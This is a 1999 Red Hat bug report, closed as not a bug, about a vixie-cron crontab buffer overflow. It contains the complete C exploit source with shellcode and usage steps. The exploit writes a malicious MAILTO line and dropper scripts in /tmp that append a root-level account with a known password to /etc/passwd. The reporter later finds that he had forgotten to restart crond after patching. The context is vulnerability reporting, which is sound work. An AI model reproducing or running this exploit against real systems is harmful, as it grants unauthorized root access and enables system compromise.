Bug 5819 - vixie cron exploit still works !
vixie cron exploit still works !
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: vixie-cron (Show other bugs)
6.0
All Linux
high Severity medium
: ---
: ---
Assigned To: Crutcher Dunnavant
http://www.life.be
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 1999-10-11 01:43 EDT by shivan
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-04-10 18:05:26 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description shivan 1999-10-11 01:43:13 EDT
'lo ..

i tried the vixie cron exploit which came out on 08/25/1999,
and it still works.

normally this exploit should have been fixed with
vixie-cron-3.0.1-37 , i installed upto 3.0.1-39 , and the
buffer overflow still works. I tried this on several
machines (all RH 6.0) with different kernels. (this also
works on alpha)

Please inform me ASAP about the progress on this bug
(original exploit pasted below).

Kind Regards,
Dimitri Avgoustakis
UNIX Administrator ..
LIFE - The Linux Company

exploit located on bugtraq :
"http://www.securityfocus.com/data/vulnerabilities/exploits/
crontab_exploit.c"

/*
        vixie-crontab-3.0.1 cron_popen() exploit by Akke -
30-8-99
                        Akke <c4c4@hehe.com>


        how to compile ?
                gcc crontab_exploit.c -o crontab_exploit

        how to use ?
                ./crontab_exploit
                crontab ./CrOn
                wait 1 minute
                crontab -r
                su -l cronexpl (password = exploited) (this
is root account)

        Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb
0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x4
0\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
        char crontab_file_string[max_buf_len];
        char temp[max_buf_len];
        FILE *fp;
        int i;

        strcpy(temp,
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
        sprintf(temp,"%s%s",temp,shellcode);
        sprintf(crontab_file_string,"MAILTO=%s\n",temp);
        strcat(crontab_file_string,"0");
        for (i=1;i<60;i++)
sprintf(crontab_file_string,"%s,%d",crontab_file_string,i);
        sprintf(temp," * * * * %s\n",CronEchoScript);
        strcat(crontab_file_string,temp);

        if ((fp = fopen(CronFile,"w+")) != NULL) {
                fprintf(fp,"%s",crontab_file_string);
                fclose(fp);
        }

        if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\necho Wrong window!");
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,CronEchoScript);
                system(temp);
        }

        if ((fp = fopen(RootScript,"w+")) != NULL) {
                #define login "cronexpl"
                #define passw "1T8uqGnJZ0OsQ" /* "exploited"
*/
                fprintf(fp,"#!/bin/sh\necho
%s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s
%s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,RootScript);
                system(temp);
        }

        if ((fp = fopen("/tmp/ce","w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,"/tmp/ce");
                system(temp);
        }
        exit(0);
}
Comment 1 shivan 1999-10-11 02:24:59 EDT
RHSA-1999:030-01: vixie-cron crond MAILTO
Comment 2 shivan 1999-10-11 03:10:59 EDT
dear redhat,

i'm pleased to tell you i'm stupid ..
i forgot to stop/start cond after upgrading ..

my apollogies ;)

Note You need to log in before you can comment on or make changes to this bug.